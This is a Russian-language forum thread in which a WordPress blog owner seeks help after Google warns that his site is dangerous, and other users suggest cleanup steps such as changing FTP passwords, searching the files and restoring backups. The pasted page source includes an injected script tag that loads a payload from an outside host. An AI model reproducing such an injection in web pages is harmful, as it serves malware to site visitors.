HELP! Проблемы с вредоносным скриптом

[andrey1204]

Помогите, пожалуйста, очень надо!
У меня есть блог.
Сегодня хотел на него зайти, а мне Гугл ругается - мол "Внимание! Посещение этого сайта может нанести вред вашему компьютеру." и ссылается на то, что у меня на сайте установлен вредоносный скрипт.
Я ничего не ставил и в партнерках не участвовал. Поэтому сам не мог его туда втыкнуть.
Блог на движке Wordpress.
При тестировке сайта в гугле и яндексе - вредоносного ничего не находит.
После просмотра сайта глазами поискового бота гугла находится левый скрипт, который и провоцирует такую ситуацию.
В админке wordpress пролистал все коды страниц шаблонов ничего не нашел.
Подозреваю, что это надо искать на моем хостинге в какой - то папке в коде страниц. Но опять же их там так много (в ворд прессе).
Пролистал половину тоже ничего не найду.


Подскажите, кто сталкивался с подобным.
Где можно найти скрипт этой заразы?

Кусок поискового кода с вредоносным скриптом (выделил) прилагаю ниже.


Большое спасибо заранее!!!

<link rel='stylesheet' id='contact-form-7-css'  href='http://igrogames.ru/wp-content/plugins/contact-form-7/styles.css?ver=2.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://igrogames.ru/wp-includes/js/jquery/jquery.js?ver=1.3.2'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://igrogames.ru/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://igrogames.ru/wp-includes/wlwmanifest.xml" /> 
<link rel='index' title='Онлайн Игры' href='http://igrogames.ru' />
<meta name="generator" content="WordPress 2.9.2" />

<!-- All in One SEO Pack 1.6.11 by Michael Torbert of Semper Fi Web Design[305,334] -->
<meta name="description" content="Все, что вы хотели знать об онлайн играх" />
<meta name="keywords" content="2011,аптечки,всем,года,декабря,завершится,новые,переход,crysis,episode,дневники,разработчиков,crytek,йорк,разрушит,ведьмак,вершины,достижения,civilization,благодарностью,поклонникам,станет,fable,эпизодах,auto,grand,jump,just,theft,ubisoft,обещает,франциско,хаос,airborne,honor,medal,модернизации,оружия,первая,система,часть,forgotten,persia,prince,sands,отрицательная,рецензия" />
<link rel="canonical" href="http://igrogames.ru/" />
<!-- /all in one seo pack -->
	<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
</head>[size="4"][color="#FF00FF"]<script src=http://villamijas.com/images/add-villa.php ></script>[/color][/size]
<body>
	<div id="wrapper">
		<div id="container" class="container"> 
            <div class="pagenav-wrapper">
    			<div class="span-22">
        			<div id="pagemenucontainer">
        				<ul id="pagemenu">
        					<li  class="current_page_item" ><a href="http://igrogames.ru/">Главная</a></li>
        					<li class="page_item page-item-51"><a href="http://igrogames.ru/kontakty/" title="Контакты">Контакты</a></li>
<li class="page_item page-item-250"><a href="http://igrogames.ru/karta-sajta/" title="Карта сайта">Карта сайта</a></li>
        				</ul>
        			</div>
    	       	</div>

 

[Felix]

Я тебе сейчас расскажу твою историю!
У тебя на компе стоит чмошный антивирус или вобще его не стоит или он не обновлён до рабочего состояния. В результате чего к тебе на комп пробрался вирус и когда ты зашол на фтп этот вирус украл пароль от фтп. После чего к тебе на фтп зашли и добаили во многие файлы вирусный код. Вот такая вот история.
Теперь твои действия:
1. Удаляем чмошный антивирус.
2. устанавливаем Каспера проверямся на вирумы полностью весь комп.
3. меняем пасс от фтп.
4. если не силён в програмировании то делаешь так. заходишь на фтп выделяешь весь сайт всё что там есть двиг, шаблоный и тп тоесть всё что ты туда заливал когда создавал сайт.
5. устанавливаем тотал командер.
6. Ищем в файлах этот кусок кода

http://villamijas.com/images/add-villa.php

с помощью тотала. Как сделать прочтёшь тут клик
7. в каждом файле где нашолся этот код открываем и удаляем его ручками.
8. проверяемся ещё раз для верности чтобы этого когда нигде не осталось.
9. заливаем обратно на фтп.

Всё вирус искаренён.

Теперь идём в гугл и просим его проверить сайт на наличие вируса, после проверки надпись в гугле что твой сайт опасен исчезнет. Яша при следующей проверки сайта тоже уберёт эту надпись.

Вот вроде и всё! Желаю удачи!

PS. Все действия выполняй согласно порядку. И переоди к следующему только после выполнения предыдущего!

 

[andrey1204]

Я тебе сейчас расскажу твою историю!
У тебя на компе стоит чмошный антивирус или вобще его не стоит или он не обновлён до рабочего состояния. В результате чего к тебе на комп пробрался вирус и когда ты зашол на фтп этот вирус украл пароль от фтп. После чего к тебе на фтп зашли и добаили во многие файлы вирусный код. Вот такая вот история.
Теперь твои действия:
1. Удаляем чмошный антивирус.
2. устанавливаем Каспера проверямся на вирумы полностью весь комп.
3. меняем пасс от фтп.
4. если не силён в програмировании то делаешь так. заходишь на фтп выделяешь весь сайт всё что там есть двиг, шаблоный и тп тоесть всё что ты туда заливал когда создавал сайт.
5. устанавливаем тотал командер.
6. Ищем в файлах этот кусок кода

http://villamijas.com/images/add-villa.php

с помощью тотала. Как сделать прочтёшь тут клик
7. в каждом файле где нашолся этот код открываем и удаляем его ручками.
8. проверяемся ещё раз для верности чтобы этого когда нигде не осталось.
9. заливаем обратно на фтп.

Всё вирус искаренён.

Теперь идём в гугл и просим его проверить сайт на наличие вируса, после проверки надпись в гугле что твой сайт опасен исчезнет. Яша при следующей проверки сайта тоже уберёт эту надпись.

Вот вроде и всё! Желаю удачи!

PS. Все действия выполняй согласно порядку. И переоди к следующему только после выполнения предыдущего!

Ну насчет антивира,это Вы загнули! У меня стоит тот же касперскмй, что Вы мне и рекомендовали.
По поводу остального, большое спасибо! Не знал, что через тотал можно ковыряться в сайтах, сейчас попробую.

 

[Felix]

Антивирус всё же стоит обновить и поставить Каспер интернет секюрити! И провериться на вирусы. Так будет надёжней.

 

[andrey1204]

Антивирус всё же стоит обновить и поставить Каспер интернет секюрити! И провериться на вирусы. Так будет надёжней.

У меня стоит именноинтернет секьюрити.
Интересно, а как я прочитаю, как искать кусок текста в тотале, если Вы поставили ссылку в слове "тут" именно на тот сайт, который и заразил мой.
Проверьте ссылку. Или дайте ее в открытом виде

 

[Felix]

ААааа чувак сориии !
Вот нормальная линка! Клац

 

[andrey1204]

ААааа чувак сориии !
Вот нормальная линка! Клац

Спасибо БОЛЬШОЕ!!!
Все работает!!!1
Сколько же их тут наискалось!!!!!
Вот у....ды и с.....и!!!!!!
Буду чистить.

 

[Felix]

Давай удачи!
Не забуть рассказать о результате.

 

[andrey1204]

Давай удачи!
Не забуть рассказать о результате.

Рассказываю о результате.
Проверку по тоталу сделал.
Скрипт нашелся.
Вроде поудалял все что нашлось.
Перепровиерил 2 раза повторно.
Все чисто.
Пароли поменял.
Гуглю попросил перепроверить.
Он перепроверил
И все равно нашел скрипт!!!
После него я опять 2 раза перепроверял тоталом - ничего нет!!!
И что теперь делать не знаю ((

Подскажите!!!

И еще новая пакость нарисовалась.
Мой касперский, когда я логинюсь в админку сайта (ворд пресс), начал ругаться на трояна!!! И поэтому блокирует вход в админку.
На другом компе проверял под нодом 32, он ничего не сказал на трояна.

Может кто-то подскажет что еще и с трояном делать?

Обратился к хостеру - тот отморозился, сказав, что у него линукс и на линуксе вирусов не пишут, поэтому антивирусник на сервер не ставил.

Вот такая незадача.

А сайт бросить жалко!!!
Все таки столько трудов и денег в него уже вклал!!!

 

[Felix]

Бросать не надо. Нет такой проблемы с которой нельзя было бы справиться.
Вирус у тебя на сайте всё равно остался, гдето сидит всёже или их было несколько по тому избавившьсь от одного остался другой.
Есть ещё вариант что у тебя на сайте залит вредоносный скрипт грубо говоря бакдур с помощью которого тебе заливают вирусы.

Самый просто вариант, копирни БД сайта и весь сайт к себе на комп (Это так на всякий случай). Проверься ещё раз на вирусы смени пасс к ФТП и проси хостера сделать бекап сайта.
Вспомни когда у тебя завелися вирусы и делай бекап на несколько дней раньше, тоесть перед тем как у тебя завесь вирусы. У хорошего хостера хранятся базы сайтов за 2 месяца. Думаю это точно поможет.

Если и это не поможет то есть ещё вариант.

 

[andrey1204]

Бросать не надо. Нет такой проблемы с которой нельзя было бы справиться.
Вирус у тебя на сайте всё равно остался, гдето сидит всёже или их было несколько по тому избавившьсь от одного остался другой.
Есть ещё вариант что у тебя на сайте залит вредоносный скрипт грубо говоря бакдур с помощью которого тебе заливают вирусы.

Самый просто вариант, копирни БД сайта и весь сайт к себе на комп (Это так на всякий случай). Проверься ещё раз на вирусы смени пасс к ФТП и проси хостера сделать бекап сайта.
Вспомни когда у тебя завелися вирусы и делай бекап на несколько дней раньше, тоесть перед тем как у тебя завесь вирусы. У хорошего хостера хранятся базы сайтов за 2 месяца. Думаю это точно поможет.

Если и это не поможет то есть ещё вариант.

Спасибо!
Буду пробовать.
О результатах отпишусь.

Бросать не надо. Нет такой проблемы с которой нельзя было бы справиться.
Вирус у тебя на сайте всё равно остался, гдето сидит всёже или их было несколько по тому избавившьсь от одного остался другой.
Есть ещё вариант что у тебя на сайте залит вредоносный скрипт грубо говоря бакдур с помощью которого тебе заливают вирусы.

Самый просто вариант, копирни БД сайта и весь сайт к себе на комп (Это так на всякий случай). Проверься ещё раз на вирусы смени пасс к ФТП и проси хостера сделать бекап сайта.
Вспомни когда у тебя завелися вирусы и делай бекап на несколько дней раньше, тоесть перед тем как у тебя завесь вирусы. У хорошего хостера хранятся базы сайтов за 2 месяца. Думаю это точно поможет.

Если и это не поможет то есть ещё вариант.

Спасибо!
Буду пробовать.
О результатах отпишусь.

Хостер не проводил автобекапы.
А я как то про это раньше не задумывался. А зря.
Поэтому откатить сайт не получиться.
Копирнул сайт на комп, касерский нащел трояна, но вылечить не смог. Можно только удалить.

Хотелось бы услышать еще варианты.

 

[Felix]

Первое что нужно сделать это сменить хостинг!
Потом придётся устанавливать сайт занаво и подгружать БД. Всё что от старого сайта с хостинга удали.
Больше вариантов нет.

 

[grizzly]

Я тебе сейчас расскажу твою историю!
У тебя на компе стоит чмошный антивирус или вобще его не стоит или он не обновлён до рабочего состояния. В результате чего к тебе на комп пробрался вирус и когда ты зашол на фтп этот вирус украл пароль от фтп. После чего к тебе на фтп зашли и добаили во многие файлы вирусный код. Вот такая вот история.
Теперь твои действия:
1. Удаляем чмошный антивирус.
2. устанавливаем Каспера проверямся на вирумы полностью весь комп.
3. меняем пасс от фтп.
4. если не силён в програмировании то делаешь так. заходишь на фтп выделяешь весь сайт всё что там есть двиг, шаблоный и тп тоесть всё что ты туда заливал когда создавал сайт.
5. устанавливаем тотал командер.
6. Ищем в файлах этот кусок кода

http://villamijas.com/images/add-villa.php

с помощью тотала. Как сделать прочтёшь тут клик
7. в каждом файле где нашолся этот код открываем и удаляем его ручками.
8. проверяемся ещё раз для верности чтобы этого когда нигде не осталось.
9. заливаем обратно на фтп.

Всё вирус искаренён.

Теперь идём в гугл и просим его проверить сайт на наличие вируса, после проверки надпись в гугле что твой сайт опасен исчезнет. Яша при следующей проверки сайта тоже уберёт эту надпись.

Вот вроде и всё! Желаю удачи!

PS. Все действия выполняй согласно порядку. И переоди к следующему только после выполнения предыдущего!

Total не рекомендую использовать вообще, из него обычно и тырят пароли если вы не в курсе)))